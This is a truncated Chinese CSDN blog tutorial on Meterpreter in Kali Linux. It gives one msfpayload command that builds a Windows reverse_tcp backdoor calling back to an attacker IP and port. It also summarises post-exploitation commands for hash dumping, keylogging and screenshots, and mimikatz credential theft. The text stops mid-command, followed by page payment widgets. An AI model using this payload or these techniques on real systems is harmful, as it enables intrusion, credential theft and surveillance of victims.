kali漏洞利用之Meterpreter介绍

本文介绍了如何在Kali Linux中生成和利用Meterpreter后门。通过设置LHOST和LPORT参数,将door.exe植入目标主机,然后在Kali上开启handler等待连接。成功连接后,可以使用Meterpreter的各种命令,如sysinfo、hashdump、screenshot、keyscan_start等进行系统信息查看、哈希抓取、屏幕截图和键盘记录。此外,还提及了扩展工具mimikatz和wdigest,它们能用于抓取明文密码和凭据。
摘要由CSDN通过智能技术生成

这里写图片描述
使用示例:

1.生成Meterpreter后门

命令语句如下,如果其中的IP为kali攻击机的IP地址,后面跟着的是参数。

msfpayload windows/meterpreter/reverse_tcp LHOST=222.28.136.223 LPORT=2333 R|msfencode -t exe -c 5 > /root/door.exe

 这个语句中,如果不知道参数是什么,可以在metasploit中查看,查看方式如下
 

use exploit/mult
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值